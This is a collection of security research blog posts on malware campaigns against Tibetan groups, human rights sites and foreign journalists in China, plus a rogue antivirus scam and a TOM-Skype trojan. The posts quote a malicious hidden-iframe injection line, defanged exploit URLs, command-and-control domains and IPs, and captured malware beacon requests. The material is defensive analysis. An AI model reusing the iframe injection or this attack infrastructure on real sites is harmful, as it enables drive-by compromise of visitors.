Posts tagged “Malware”

Rogue AV: IAV Pro



iavpro

Internet AntiVirus Pro is rogue anti-virus software that is uses fake scans and threats to entice users into downloading and purchasing the software. Moreover, IAV uses intermediary sites that force users to download the software. there is no easy way to uninstall the software and the IAV demonds that people pay to receive software that can uninstall the software that they never wanted in the first place. (For more about these guys read Dancho Danchev’s blog).

The “Support” form on IAV web sites stores submissions from users in a web accessible directory.

infectedhosts

The 1200+ submissions found on one server mostly focused on the inability to remove the software and that fact that they either installed it by mistake or had no idea how the software was installed.

Some are polite…

Subject: Removal
Content: Please remove this file from my system. I had run this by mistake. I already have my own antivirus. Thanks!
Country:CA

Some are not so polite…

Subject: fuck this shit
Content: get this shit off my computer, now!!!!
Country:US

Overall, people are extremely frustrated and unsure of what to do. Some seem to believe that this is a real anti virus product — some even ask if they are related to other real anti virus products. Many also indicate that they already have AV products installed.

Others recognise that it is a scam but are unable to do anything about it. Many state that it was their children that installed the software thinking they were doing their parents a favour. They also describe how it is interfering with their businesses, education and general computer usage.

What outrages people the most seems to be the fact that the rogue AV demands that you buy the software if you want to be able to uninstall it.

It is a good reminder that this stuff affects real peoples lives in a very unpleasant way.

“0day”: Civil Society and Cyber Security



by Nart Villeneuve & Greg Walton

Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks.

However, civil society organizations are being compromised by attackers using “0day” exploits – vulnerabilities for which there is no patch of “fix” available from the software vendor. Therefore, even if all the software a civil society organization is using is completely up-to-date it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.

It is difficult to determine who is behind the attacks and there may be no intent to target civil society specifically. Perhaps using a human rights themed email in a social engineering attack might just be a convenient way to get peoples’ attention and compromise computer systems. Moreover, it remains unclear if the attackers were able to acquire 0day exploits before they became public, or if they simply quickly leveraged after they became publicly available and before there was a vendor supplied security patch.

Therefore, in this post we explore cases in which there is a some form of relationship between 0day exploits and their use against civil society organizations in an effort to understand the effect of these attacks given the difficult nature of attribution.

In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.1 The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.

Summary

  • Civil society organizations are compromised and used as vehicles to deliver 0day exploits
  • Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
  • Attackers leverage human rights issues as the context for malware distribution
  • The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Background

There is a wealth of information studying 0day malware attacks emanating from locations such as Russia and China. These reports document the ability of the attackers to leverage 0day exploits in their attacks:

One of the most striking features of these attacks is how quickly they adapt new exploits to their
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.2

However, these reports do not focus on explicitly political attacks but integrate a variety of threats including fraud, acquiring gaming credentials and in general the theft of information. But the exploration of politically motivated malware attacks using 0day exploits is certainly nothing new.

Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.3 Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.4 These attacks targeted NGO’s, the Tibetan community as well as the Falun Gong movement. Van Horenbeeck’s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.5

Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the “GhostNet” investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with a malware that connected back to the domain control server on 221.10.254.248 using the host name 927.bigwww.com (221.10.254.248).6 On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.7

In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as a Tibetan NGO called Drewla had bee compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including the JBIG2 buffer overflow vulnerability.8 At Drewla we also found a computer connection to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck9 as well as connections to religion.xicp.net which was reportedly serving a 0day in February 2009.10

Investigation

On 2009-07-06 ISC SANS posted a list of domain that were hosting 0day Internet Explorer exploits and 64tianwang.com was on the list.11 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus widely on human rights and had to move their website overseas after it was shut down by Chinese authorities.12 The organization’s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.1314 The 64tianwang.com has previously been a target for internet-based attacks.15

An examination the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe was inserted into the legitimate content on the page. In fact, we have see “iframe attacks” affect a variety of organizations including the Foreign Correspondents’ Club of China (www.fccchina.org).16 Anyone visiting 64tianwang.com was loading a malicious page from rfsb.xicp.net:

document.write(“<iFraMe width=’0′ height=’0′ src=’hxxp://rfsb.xicp.net/css/a.htm’ frameborder=’0’>“);

The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.17 Anyone visiting 64tianwang.com using Internet Explorer was likely compromised.

Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers changed the directory used in the initial attack, “css”, to “cssbak” and began serving the Microsoft Office Web Components 0day in the “css” directory instead.18 Several versions of Microsoft Office were affected and anyone visiting this malicious page could be compromised even of their security updates were current.19

The details for the malicious website are:

Name: rfsb.xicp.net
Address: 222.223.89.17
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting some phishing pages posing at login screen for a variety of Chinese or Chinese language versions of email providers including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.

“Phishing” is a terms that refers to the fraudulent use of legitimate looking website to entice a using in revealing sensitive information such as user names and passwords.20 In this case, the attacks appear to be particularly interested in compromising users on Chinese email providers.

If users attempt to login to their email account, the credentials are forwarded to various servers under the attackers’ control:

121.22.23.254
netname: UNICOM-HE
descr: China Unicom Hebei province network
descr: China Unicom
country: CN

124.237.109.234
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

121.22.28.29
netname: QHD-YIWANGKEJI
descr: CNC Group CHINA169 Hebei Province Network
country: CN

222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

The attackers use script that directs the users to a server under the control of the attacker and then redirects the user to the legitimate mail provider.

In the case of QQ the attackers used malicious flash files that connect out to a server under the attackers control.21

Interestingly, all the IP’s are in Hebei Province.

The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.22

Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.

This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.23

The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a “Petition for the Release of Tibetan Filmmaker Dhondup Wangchen” hosted on Facebook which is sponsored by Students for a Free Tibet. However, the email also contains a link to hxxp://dump.vicp.cc/groups/articles.asp?n=3 which loads the real petition along with a malicious frame.

Subject: Re: Petition for Tibetan filmmaker’s
Date: Wed, 29 Jul 2009 22:52:26 +0800
From: Tseten Samdup
To: tsetenfreetibet@gmail.com

Here is the the petition lauched by SFT.

http://apps.facebook.com/causes/petitions/26?m=bcb306a2&recruiter_id=58958974&_fb_noscript=1

They have already collected 27,660 signatures.
Please sign your name if you have not.

Tseden Samdup

> ———- Forwarded message ———-
> From: RSF ASIA
> Date: Wed, Jul 29, 2009 at 8:05 AM
> Subject: Petition for Tibetan filmmaker’s
> To: tsetenfreetibet@gmail.com
>
>
> Reporters Without Borders/Reporters sans frontières
>
> 29 July 2009
>
> CHINA – TIBET
> More than 13,000 signatures on petition for Tibetan filmmaker’s release
> http://www.rsf.org/More-than-13-000-signatures-on.html
>
> Reporters Without Borders has given the Chinese authorities a petition
> calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,
> who has been held since 23 March 2008 and is seriously ill with hepatitis B,
> which is not being properly treated. According to recent reports, he is now
> in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).
>
> At the time of his arrest, Wangchen was completing a documentary about Tibet
> that was shown to foreign journalists in Beijing during the Olympic Games.
> He may be tried on charges of “separatism”.
>
> “There is an urgent need for the competent authorities to heed the appeal
> made by thousands of citizens around the world on behalf of a man whose only
> crime was to have filmed interviews,” Reporters Without Borders said. “The
> government should take account of Dhondup Wangchen’s state of health and
> free him on humanitarian grounds.”
>
> Reporters Without Borders handed in the petition today to the Chinese
> embassy in Paris. It was signed by 13,941 people, who included Tibetans,
> Indians, westerners, and eight Australian parliamentarians. Wangchen’s wife,
> Lhamo Tso, who is a refugee in northern India, collected several thousand
> signatures with the help of the Tibet Post (www.thetibetpost.com).
>
> See Lhamo Tso’s campaign video:
> http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news
>
> Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is
> meanwhile being denied access to him. Li has allowed to see him only once
> since the start of the year in April. Like many human rights lawyers in
> China, he is being harassed by the government, which is threatening to
> rescind his licence if he does not drop the case.
> Vincent Brossel
> Asia-Pacific Desk
> Reporters Without Borders
> 33 1 44 83 84 70
> asia@rsf.org

The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.24

This page loads “xp.swf” and drops “zjss.exe” onto the system which attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (there is not currently anything running on 8080). (This same domain was used in a 2006 0day for Japanese word processing software).25

Also hosted in this sites is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film “Leaving Fear Behind.” Dhondup Wangchen is director of the film.

In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.

The IP address for dump.vicp.cc 210.56.60.132 which is assigned to:

netname: SUN-NETWORK
descr: Sun Network (Hong Kong) Limited
descr: Internet Service Provider in Hong Kong
country: HK

Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis.

In addition to an email that was released by Reporters Without Borders (RSF) a web page was also setup on the RSF web site that highlighted the fact that more than 13,000 people signed a petition to release Dhondup Wangchen. However, the page on the RSF web site contained the same link from the malicious email that included both the legitimate Facebook petition by Students for a Free Tibet as well as the malicious link to dump.vicp.cc.26

RSF promptly removed the malicious link after being alerted.

Conclusion

Our findings indicate that civil society organizations are compromised and used as vehicles to deliver 0day exploits to others (e.g. via malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site – many of whom may be staff and supporters of the specific organization – are likely to be compromised.

We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.

The attackers leverage human rights issues as the context for malware distribution in what are commonly called “social engineering” attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website.

These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.

However, the murky questions of intent of the attackers as well responsibility for the attacks remain unclear. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used just like any other random target as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights themed email to in a social engineering attack might just be a convenient way to get peoples’ attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might more easily enticed to click on such a link.

An alternative explanation is that attackers are intent on targeting civil society and are developing and/or have access to 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society and we are noticing an increasing level of contextual relevance in these attacks. Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contain less spelling and grammatical errors and exploit legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks actually may limit the total number of hosts but provide the attackers with politically sensitive hosts.

While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in a Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.

2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf

3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf

4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210

8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219

9 http://isc.sans.org/diary.html?storyid=4177

10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0

11 http://isc.sans.org/diary.html?storyid=6739&rss

12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&emc=th&pagewanted=all

13 http://www.hrichina.org/public/contents/press?revision_id=147917&item_id=56408

14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html

15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/

16 The FCCC’s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp//http://www.nontopworld.com/mainpage.htm.

17 http://isc.sans.org/diary.html?storyid=6733

18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html

19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

20 http://en.wikipedia.org/wiki/Phishing

21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&type=swf

22 http://domain.oray.cn/#tab=free

23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm

24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html

25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0

26 The same page in the Google cache from a day earlier did not contain the malicious link.

“0day”: Civil Society and Cyber Security



Greg and I have put up a new post on the IWM and Malware Lab about 0day exploits and Civil Society organizations. It s not about coordinated 0day attacks but rather some general trends and patterns that we’re seeing. We’re finding that the websites of civil society organizations are being used to push malware — usually through iframe injection — and that malware campaigns often leverage human rights related themes. Also, despite the fact that some attacks may be unintentional (e.g. mass iframe injection), it results in a situation in which civil society organizations are intimidated and their operations are disrupted. The key issues we identified are:

  • Civil society organizations are compromised and used as vehicles to deliver 0day exploits
  • Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
  • Attackers leverage human rights issues as the context for malware distribution
  • The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Targeted Malware Attack on Foreign Correspondent’s based in China



By Nart Villeneuve and Greg Walton

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from “Pam ” who claimed to be an editor with the Straits Times, that came with a PDF attachment that contains malware. When opened, malicious code in the PDF exploits the Adobe Reader program and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.2 These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.3

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.4

Key Findings:

  • The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.
  • The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.
  • The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.
  • The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.
The Pam Bourdon Email

The Pam Bourdon Email

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.5

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.6

The Pam Bourdon Attachment

The Pam Bourdon Attachment

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230
zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.7 In those cases, the malware attempted to connect to:

ihe1979.3322.org
ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.8 In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org
feng.pc-officer.com | 216.255.196.154
feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.9 This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_42

HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.10 Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]

where [random characters] string may look similar to:

* qRXycRXuwJ11749
* PqJNBkcPDm18630
* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report11 after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache
new_host_24

HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_23

HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.12 The attackers have pointed these domains to IP’s on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “sunny@hetu.cn” and the phone number “86-010-4564654.” There are some links between these data and the registration data in other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “asdfi@hotmail.com” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” with the email address “afsaf@hotmail.com.” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “harry@hetu.cn.” However the technical contact is “lin hai” with the email address “sunny@hetu.cn.”

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.13 The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.14

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic if China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] See, http://www.fccchina.org/2009/09/21/warning-on-fake-emails-targeting-news-assistants/ and http://www.reuters.com/article/internetNews/idUSTRE58L0LJ20090922

[2] http://edition.cnn.com/2009/WORLD/asiapcf/09/21/china.national.day/

[3] http://www.pcworld.com/article/172627/china_clamps_down_on_internet_ahead_of_60th_anniversary.html , http://ifex.org/china/2009/09/23/censorship_and_cyber_attacks/

[4] This follows an investigation of the FCCC’s web server conducted last month. The FCCC’s WordPress installation was compromised and malicious “iframes” were inserted which loaded www.nontopworld.com/homepage.htm and www.nontopworld.com/mainpage.htm. The IP address for nontopworld.com (58.64.130.11) appears on a list of IP addresses linked to the Russian Business Network (RBN). http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt

[5] http://www.weforum.org/en/events/ArchivedEvents/AnnualMeetingoftheNewChampions2009/index.htm

[6] http://www.virustotal.com/analisis/dbcdddc779877d4ca2e30b6d21d407f661379155775ae39ec545984095ed07dd-1253586587

[7] http://isc.sans.org/diary.html?storyid=3400, http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf, http://www.daemon.be/maarten/targetedattacks.html, http://www.virustotal.com/analisis/755530853391444e729220443ce869e908f060c345b2c2aaac8b3cb5e6bffe7a-1190194670, http://www.virustotal.com/analisis/f5eaf65eefad528e6e46cb9c51ae3fb07b9f9b851a338235d787c963a47f80d6-1223527899, http://www.virustotal.com/analisis/d77f3145624c2ae20581265773d509d7ee9ad7e65ba187b891f777feb794ebfb-1190849733

[8] http://www.f-secure.com/weblog/archives/00001649.html and http://www.virustotal.com/analisis/cc15b6402c507364a41c32f8b4176670bc609259543523d42a865c2823b6dd2e-1238734246

[9] http://www.cc.ncu.edu.tw/Eng_faq/anti-virus.php

[10] http://blog.threatexpert.com/2009/02/politically-motivated-trojan.html, http://www.threatexpert.com/report.aspx?md5=02f2029647e85fff81620b2c333bc9cf and http://www.threatexpert.com/report.aspx?md5=7ce96a0ed4d71c26d2c377dd331e4466

[11] http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

[12] http://www.businessweek.com/magazine/content/08_16/b4080032218430_page_4.htm

[13] http://www.themalaysianinsider.com/index.php/world/38375-e-mail-viruses-target-foreign-media-in-china

[14] http://www.nytimes.com/reuters/2009/09/22/world/international-us-china-cyberattack.html?_r=1

Targeted Malware Attack on Foreign Correspondents based in China



There’s a new Infowar Monitor blog post by Greg and I on the targeted malware attack on foreign correspondents based in China. The case is interesting to me because of the connections to other attacks that have been investigated by others, including Maarten Van Horenbeeck, F-Secure, ThreatExpert, and us in the past.

For me, it illustrates that we need to share information about these attacks rather than keep it all to ourselves. If incidents are treated as isolated cases the bigger picture and broader implications can’t be well understood. It is important to recognize that the same attackers are targeting a wide variety of organizations — not just yours :). The flip side is that the attackers become aware of what we know about them, and it may blow surveillance. But at this point I think it is more important to understand the broader pattern and significance of the attacks. Moreover, it is important to understand the motivations behind the attacks and at this point the best way of doing that is looking at the targets of the attackers and fitting them into a broader contextual analysis.

Anyway, I just want to say thanks to Van Horenbeeck, F-Secure (Mikko), and ThreatExpert.

TOM-Skype Trojan.Addclicker



One of the links on skype.tom.com points to http://www.skycn.com/skype1/index.html where another version of TOM-Skype is available for download. When I install this version, I receive a Trojan warning from Norton. The file promote.dll (http://skypetools3.tom.com/download/promote/promote.dll) is installed by TOM-Skype and is flagged by Norton as Trojan.Addclicker:

